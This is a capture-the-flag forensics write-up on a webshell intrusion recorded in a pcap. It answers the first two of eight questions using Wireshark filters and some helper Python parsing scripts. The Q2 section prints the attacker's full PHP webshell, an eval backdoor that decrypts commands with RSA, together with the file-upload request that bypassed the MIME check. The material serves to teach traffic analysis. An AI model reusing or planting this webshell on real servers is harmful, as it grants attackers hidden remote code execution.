Webshell traffic analysis - Practice1

Challenge description: the attachment at the top is the pcap file used in this challenge. Based on it, answer the following 8 questions and combine the answers into a flag in MD5 form.

Q1. What is the attacker's IP address?

Q2. What is the name of the file the attacker uploaded through the vulnerability to connect to the server?

Q3. Which tool did the attacker use to connect to the uploaded webshell?

Q4. Which vulnerability did the attacker exploit?

Q5. What is the connection password for the webshell?

Q6. What is the first system command the attacker executed after connecting to the webshell?

Q7. What is the content of the file the attacker uploaded through the webshell?

Q8. What is the name of the system user the attacker created?

Q1

Approach

During a network attack the attacker keeps up frequent communication with the server, so filter for the IP conversation with the most traffic and then work out which side is the attacker.

Steps

Open Wireshark, go to "Statistics" -> "Conversations" and select the "IPv4" tab. The busiest conversation is between 192.168.11.39 and 192.168.11.93; in that record 192.168.11.39 is the side that initiated the communication, so the attacker is 192.168.11.39.
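As an added illustration (not part of the original writeup), the script below reproduces the Conversations-tab logic without Wireshark: it walks a libpcap file, counts packets per IPv4 pair, and marks the host that sent the first bare SYN as the initiator. The pcap is constructed inline with made-up frames; the challenge capture is not included.

```python
import struct

def build_frame(src, dst, tcp_flags):
    """Ethernet/IPv4/TCP frame with an empty payload (constructed test data, not the challenge pcap)."""
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, 5 << 4, tcp_flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp   # 14-byte Ethernet header, EtherType IPv4

def build_pcap(frames):
    """Wrap frames in a little-endian libpcap file (link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out

def ipv4_conversations(pcap):
    """Per unordered IPv4 pair: packet count and the host that sent the first bare SYN."""
    endian = "<" if pcap[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    stats, off = {}, 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "I", pcap[off + 8:off + 12])[0]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                   # not IPv4, skip
        ihl = (frame[14] & 0x0F) * 4
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        entry = stats.setdefault(frozenset((src, dst)), {"packets": 0, "initiator": None})
        entry["packets"] += 1
        tcp = frame[14 + ihl:]
        if frame[23] == 6 and entry["initiator"] is None and len(tcp) >= 14:
            if (tcp[13] & 0x12) == 0x02:               # SYN set, ACK clear: connection opener
                entry["initiator"] = src
    return stats

def busiest_conversation(pcap):
    """The pair with the most packets, i.e. the top row of Wireshark's IPv4 Conversations tab."""
    stats = ipv4_conversations(pcap)
    pair = max(stats, key=lambda k: stats[k]["packets"])
    return sorted(pair), stats[pair]["packets"], stats[pair]["initiator"]

# Constructed sample: a chatty session opened by .39 toward .93, plus a quieter one from another host.
SAMPLE = build_pcap(
    [build_frame("192.168.11.39", "192.168.11.93", 0x02),         # SYN
     build_frame("192.168.11.93", "192.168.11.39", 0x12)]         # SYN-ACK
    + [build_frame("192.168.11.39", "192.168.11.93", 0x18)] * 40  # PSH-ACK requests
    + [build_frame("192.168.11.93", "192.168.11.39", 0x10)] * 40  # ACK replies
    + [build_frame("192.168.11.10", "192.168.11.93", 0x02)]
    + [build_frame("192.168.11.10", "192.168.11.93", 0x10)] * 5
)

if __name__ == "__main__":
    print(busiest_conversation(SAMPLE))
```

Pointing `ipv4_conversations` at the challenge pcap gives the same 192.168.11.39 / 192.168.11.93 pair the Wireshark dialog shows, with the initiator column answering Q1.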

Q2

Approach

This question tests a file-upload vulnerability; the webshell filename can be found by tracking the upload action itself (multipart/form-data). When the attacker submits the webshell in a POST request, the packet's Content-Type is usually multipart/form-data, so filter on that, then follow the stream to reconstruct the dialogue between attacker and server and pick the uploaded webshell name out of it.

Steps

Step 1. Filter the packets. In Wireshark, set a display filter for http.request.method POST with a content_type containing "multipart"; only one packet matches, Frame 16651:

http.request.method == POST && http.content_type contains "multipart/form-data"

Step 2. Follow the stream of that packet. I have put the key parts in the block below; it shows three rounds of dialogue between the attacker and host 192.168.11.93. In the first round the attacker sends a POST request whose form uploads a file named san.php (filename="san.php"), and the server returns HTTP/1.1 200 OK. Because a trojan submitted to the server is usually renamed on disk, the attacker then sends a second-round GET request; the server answers HTTP/1.1 200 OK with a long block of HTML, near the bottom of which the path uploads/1768728211_696ca6939300d_san.php appears: that is the attacker's uploaded file. With the real path in hand, the attacker sends a third-round GET straight to the trojan just uploaded, and the server cleanly returns HTTP/1.1 200 OK. From then on the attacker can pull out a tool such as AntSword (蚁剑) or Godzilla (哥斯拉) and start controlling the server remotely. So the file uploaded to connect to the server is 1768728211_696ca6939300d_san.php.

POST /upload.php HTTP/1.1
Host: 192.168.11.93
Content-Length: 882
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.11.93
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUczYToC2RbAgYvPk
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive
------WebKitFormBoundaryUczYToC2RbAgYvPk
Content-Disposition: form-data; name="file"; filename="san.php"
Content-Type: image/jpeg
<?php
@error_reporting(0);
$data = @$_POST['shell'];
if (isset($data)) {
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCd4MxZ+bp49Fy3KF/kfTUbOgaJ
VQTKVbvAEtA+mdowqmPZUKaE2R6EKgBoFSPdifyTtVDj3WjEezSYFiYOZlYwEYT6
RhzwnmczKI/QKDq1+BUZqKF0FdyoQVJIo/3M5t+uBVswwlQ5l+eBo9fCdXqrI5xJ
xib6Z/MRrAYtbLkykwIDAQAB
-----END PUBLIC KEY-----
EOF;
    $pk_res = openssl_pkey_get_public($pk);
    $chunks = explode("|", $data);
    $payload = '';
    foreach ($chunks as $chunk) {
        $decrypted = '';
        if (openssl_public_decrypt(base64_decode($chunk), $decrypted, $pk_res)) {
            $payload .= $decrypted;
        }
    }
    eval($payload);
}
?>
------WebKitFormBoundaryUczYToC2RbAgYvPk--
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache


GET /admin.php HTTP/1.1
Host: 192.168.11.93
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>............ - ..................</title>
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        .admin-header {
            background: linear-gradient(135deg, #2c3e50 0%, #34495e 100%);
            color: white;
            padding: 20px 0;
            margin-bottom: 30px;
        }
        
        .admin-main {
            min-height: 600px;
        }
        
        .admin-stats {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 20px;
            margin-bottom: 30px;
        }
        
        .stat-card {
            background: white;
            padding: 25px;
            border-radius: 12px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.05);
            text-align: center;
            transition: transform 0.3s;
        }
        
        .stat-card:hover {
            transform: translateY(-5px);
        }
        
        .stat-icon {
            font-size: 36px;
            margin-bottom: 15px;
            color: #3498db;
        }
        
        .stat-number {
            font-size: 32px;
            font-weight: bold;
            color: #2c3e50;
            margin-bottom: 10px;
        }
        
        .stat-label {
            color: #666;
            font-size: 14px;
        }
        
        .admin-actions {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 20px;
            margin: 30px 0;
        }
        
        .action-card {
            background: white;
            padding: 30px;
            border-radius: 12px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.05);
            text-decoration: none;
            color: inherit;
            transition: all 0.3s;
            border-left: 4px solid #3498db;
        }
        
        .action-card:hover {
            transform: translateY(-5px);
            box-shadow: 0 15px 30px rgba(0,0,0,0.1);
            background: #3498db;
            color: white;
        }
        
        .action-card:hover .action-icon {
            color: white;
        }
        
        .action-icon {
            font-size: 32px;
            color: #3498db;
            margin-bottom: 15px;
        }
        
        .action-title {
            font-size: 18px;
            margin-bottom: 10px;
            font-weight: 600;
        }
        
        .action-desc {
            color: #666;
            font-size: 14px;
        }
        
        .action-card:hover .action-desc {
            color: rgba(255,255,255,0.9);
        }
        
        .admin-table-container {
            background: white;
            border-radius: 12px;
            padding: 30px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.05);
            margin-top: 30px;
            overflow-x: auto;
        }
        
        .admin-table {
            width: 100%;
            border-collapse: collapse;
        }
        
        .admin-table th {
            background: #f8f9fa;
            color: #2c3e50;
            font-weight: 600;
            text-align: left;
            padding: 15px;
            border-bottom: 2px solid #e9ecef;
        }
        
        .admin-table td {
            padding: 15px;
            border-bottom: 1px solid #e9ecef;
        }
        
        .admin-table tr:hover {
            background: #f8f9fa;
        }
        
        .file-cell {
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        .file-cell i {
            color: #3498db;
        }
    </style>
</head>
<body>
    <header class="admin-header">
        <div class="container">
            <div class="header-top">
                <div class="logo">
                    <i class="fas fa-tachometer-alt"></i>
                    <span>...............</span>
                </div>
                <div class="header-info">
                    <div class="info-item">
                        <i class="fas fa-user-shield"></i>
                        <span>............admin</span>
                    </div>
                    <div class="info-item">
                        <i class="fas fa-sign-out-alt"></i>
                        <span><a href="logout.php" style="color: white; text-decoration: none;">............</a></span>
                    </div>
                </div>
            </div>
            
            <nav class="main-nav">
                <ul>
                    <li class="active"><a href="admin.php"><i class="fas fa-tachometer-alt"></i> .........</a></li>
                    <li><a href="upload.php"><i class="fas fa-cloud-upload-alt"></i> ............</a></li>
                    <li><a href="view.php"><i class="fas fa-folder-open"></i> ............</a></li>
                    <li><a href="#"><i class="fas fa-users"></i> ............</a></li>
                    <li><a href="#"><i class="fas fa-chart-bar"></i> ............</a></li>
                    <li><a href="index.php"><i class="fas fa-home"></i> ............</a></li>
                </ul>
            </nav>
        </div>
    </header>

    <main class="container admin-main">
        <div class="admin-stats">
            <div class="stat-card">
                <div class="stat-icon">
                    <i class="fas fa-users"></i>
                </div>
                <div class="stat-number">4</div>
                <div class="stat-label">............</div>
            </div>
            
            <div class="stat-card">
                <div class="stat-icon">
                    <i class="fas fa-file-alt"></i>
                </div>
                <div class="stat-number">6</div>
                <div class="stat-label">............</div>
            </div>
            
            <div class="stat-card">
                <div class="stat-icon">
                    <i class="fas fa-cloud-upload-alt"></i>
                </div>
                <div class="stat-number">6</div>
                <div class="stat-label">............</div>
            </div>
            
            <div class="stat-card">
                <div class="stat-icon">
                    <i class="fas fa-hdd"></i>
                </div>
                <div class="stat-number">
                    0                </div>
                <div class="stat-label">............(MB)</div>
            </div>
        </div>
        
        <h2 class="section-title"><i class="fas fa-welcome"></i> ...........................</h2>
        <p style="color: #666; margin-bottom: 30px;">.....................................................................</p>
        
        <div class="admin-actions">
            <a href="upload.php" class="action-card">
                <div class="action-icon">
                    <i class="fas fa-cloud-upload-alt"></i>
                </div>
                <h3 class="action-title">............</h3>
                <p class="action-desc">...........................</p>
            </a>
            
            <a href="view.php" class="action-card">
                <div class="action-icon">
                    <i class="fas fa-folder-open"></i>
                </div>
                <h3 class="action-title">............</h3>
                <p class="action-desc">...........................</p>
            </a>
            
            <a href="#" class="action-card">
                <div class="action-icon">
                    <i class="fas fa-users-cog"></i>
                </div>
                <h3 class="action-title">............</h3>
                <p class="action-desc">...........................</p>
            </a>
            
            <a href="#" class="action-card">
                <div class="action-icon">
                    <i class="fas fa-chart-line"></i>
                </div>
                <h3 class="action-title">............</h3>
                <p class="action-desc">..............................</p>
            </a>
        </div>
        
        <div class="admin-table-container">
            <h3 class="section-title" style="margin-top: 0;"><i class="fas fa-history"></i> .....................</h3>
            
                        <table class="admin-table">
                <thead>
                    <tr>
                        <th>.........</th>
                        <th>......</th>
                        <th>............</th>
                        <th>......</th>
                    </tr>
                </thead>
                <tbody>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-code"></i>
                                <span>san.php</span>
                            </div>
                        </td>
                        <td>0.7 KB</td>
                        <td>2026-01-18 17:23</td>
                        <td>
                            <a href="uploads/1768728211_696ca6939300d_san.php" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768728211_696ca6939300d_san.php" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-code"></i>
                                <span>san.php</span>
                            </div>
                        </td>
                        <td>0.7 KB</td>
                        <td>2026-01-18 15:31</td>
                        <td>
                            <a href="uploads/1768721510_696c8c668ba5e_san.php" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768721510_696c8c668ba5e_san.php" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-code"></i>
                                <span>san.php</span>
                            </div>
                        </td>
                        <td>0.5 KB</td>
                        <td>2026-01-18 15:18</td>
                        <td>
                            <a href="uploads/1768720729_696c89591a5fc_san.php" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768720729_696c89591a5fc_san.php" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-image"></i>
                                <span>san.jpg</span>
                            </div>
                        </td>
                        <td>0.5 KB</td>
                        <td>2026-01-18 15:18</td>
                        <td>
                            <a href="uploads/1768720704_696c8940c0407_san.jpg" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768720704_696c8940c0407_san.jpg" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-image"></i>
                                <span>san.jpg</span>
                            </div>
                        </td>
                        <td>0.5 KB</td>
                        <td>2026-01-18 15:08</td>
                        <td>
                            <a href="uploads/1768720109_696c86ed6d272.jpg" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768720109_696c86ed6d272.jpg" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                    </tbody>
            </table>
            
                        <div style="text-align: center; margin-top: 20px;">
                <a href="view.php" class="btn btn-outline">..................</a>
            </div>
                        
                    </div>
    </main>
</body>
</html>


GET /uploads/1768728211_696ca6939300d_san.php HTTP/1.1
Host: 192.168.11.93
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/admin.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
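The three-round correlation described in Step 2, as an added example that is not part of the original writeup: it pulls the original filename and declared MIME type out of the multipart part, collects every stored copy the admin page links to, and keeps the copy the attacker subsequently fetched with a 200. The stream is a constructed, heavily trimmed replay of the dump above with the webshell body replaced by a placeholder.

```python
import re

# Constructed, abbreviated replay of the three rounds in the follow-stream dump above
# (most headers trimmed, webshell body replaced by a placeholder); not the challenge pcap.
STREAM = """POST /upload.php HTTP/1.1
Host: 192.168.11.93
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUczYToC2RbAgYvPk

------WebKitFormBoundaryUczYToC2RbAgYvPk
Content-Disposition: form-data; name="file"; filename="san.php"
Content-Type: image/jpeg

<?php /* webshell body omitted */ ?>
------WebKitFormBoundaryUczYToC2RbAgYvPk--
HTTP/1.1 200 OK

GET /admin.php HTTP/1.1
Host: 192.168.11.93

HTTP/1.1 200 OK
<a href="uploads/1768728211_696ca6939300d_san.php" target="_blank">view</a>
<a href="uploads/1768721510_696c8c668ba5e_san.php" target="_blank">view</a>

GET /uploads/1768728211_696ca6939300d_san.php HTTP/1.1
Host: 192.168.11.93

HTTP/1.1 200 OK
"""

# One multipart file part: original filename, declared MIME type, first bytes of the body.
PART_RE = re.compile(r'Content-Disposition: form-data; name="[^"]*"; filename="([^"]+)"\r?\n'
                     r'Content-Type: ([^\r\n]+)\r?\n\r?\n(.{0,5})', re.S)
# A GET request, its headers, the blank line, then the status code of the reply that follows.
GET_RE = re.compile(r'GET /(\S+) HTTP/1\.[01]\r?\n(?:[^\r\n]+\r?\n)*\r?\nHTTP/1\.[01] (\d{3})')

def uploaded_parts(stream):
    return [m.groups() for m in PART_RE.finditer(stream)]

def stored_candidates(stream, filename):
    """Links the server exposes for stored copies that still end in the original filename."""
    return sorted(set(re.findall(r'href="([^"]*%s)"' % re.escape(filename), stream)))

def fetched_with_status(stream):
    return {path: int(code) for path, code in GET_RE.findall(stream)}

def trace_webshell(stream):
    """Tie the rounds together: which stored copy was fetched with 200 after the upload."""
    parts = uploaded_parts(stream)
    if not parts:
        return None
    filename, ctype, head = parts[0]
    fetched = fetched_with_status(stream)
    live = [p for p in stored_candidates(stream, filename) if fetched.get(p) == 200]
    return {
        "uploaded_as": filename,
        "declared_type": ctype,
        # image/* declared but a PHP open tag in the body: the upload filter was bypassed
        "type_mismatch": ctype.startswith("image/") and head.startswith("<?"),
        "stored_as": live[0] if live else None,
    }
```

Running `trace_webshell` on the full Follow-TCP-Stream export gives the same answer as reading the dump by hand, and the type_mismatch flag is the detection signal a defender would alert on at the upload handler.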